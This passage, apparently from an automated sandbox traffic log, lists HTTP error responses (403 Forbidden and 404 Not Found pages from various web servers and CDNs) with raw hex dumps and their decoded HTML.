70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1><h2 style="margin-top:20px;font-size: 30px;">Forbidden</h2><p>Access
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:45 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 22 Mar 2023 04:44:45 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 22 Mar 2023 04:44:53 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:45 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: keep-aliveServer: ApacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: ffc0eb91-35b7-467a-9246-2b13d0ad4110CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vl0ZnFsEQgbkTrqWS8UHjlnujwWcXnD0QGy8L7oMYN3PoWegKGDW%2BJd%2B856SbLIUMU7GtrCcG%2FbGbUr%2FQl0pxr9S41fgeJnnAfbWw0I8DVhhlHsLANk7lqP2q4E8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=145.999908Server: cloudflareCF-RAY: 7abbc804c9df922c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:46 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: keep-aliveServer: ApacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:45 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 22 Mar 2023 04:45:01 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lgx9OstBZDYSc4UYBMwp2BckpPeXbgmWcw0QmeGJPH6RcoLarghZ4RxgJGvlQoJgaQicHHJty5u2iwXpiYZQ3wci0a%2BLlXFkv%2FEzHubFswZjniVj4LqDZz0%2Bv5PZKA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8083f3e2c01-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:44:46 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:47 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
